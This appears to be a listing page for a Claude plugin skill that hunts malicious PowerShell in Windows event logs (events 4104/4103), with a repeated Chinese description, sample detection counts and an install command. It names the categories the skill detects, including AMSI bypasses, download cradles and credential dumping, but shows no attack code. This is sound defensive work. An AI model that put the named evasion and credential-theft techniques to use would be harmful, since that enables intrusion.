Stats
Actions
Tags
Hunts malicious PowerShell activity in Windows EVTX logs (events 4104/4103) by parsing script blocks, detecting obfuscation, AMSI bypasses, encoded payloads, credential dumps, and download cradles.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity-skills-zh:hunting-for-anomalous-powershell-executionThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
PowerShell 脚本块日志记录(事件 ID 4104)会记录在 Windows 终端上执行的完整去混淆脚本文本,使其成为狩猎恶意 PowerShell 的主要数据源。结合模块日志(4103)和进程创建事件,分析员即使在攻击者使用混淆层的情况下,也能检测编码命令、AMSI 绕过模式、下载器(download cradles)、凭据窃取工具和无文件攻击技术。
PowerShell 脚本块日志记录(事件 ID 4104)会记录在 Windows 终端上执行的完整去混淆脚本文本,使其成为狩猎恶意 PowerShell 的主要数据源。结合模块日志(4103)和进程创建事件,分析员即使在攻击者使用混淆层的情况下,也能检测编码命令、AMSI 绕过模式、下载器(download cradles)、凭据窃取工具和无文件攻击技术。
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}
npx claudepluginhub killvxk/cybersecurity-skills-zhParses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.
Analyzes Windows EVTX event logs to detect malicious PowerShell activity, including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping.
Analyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).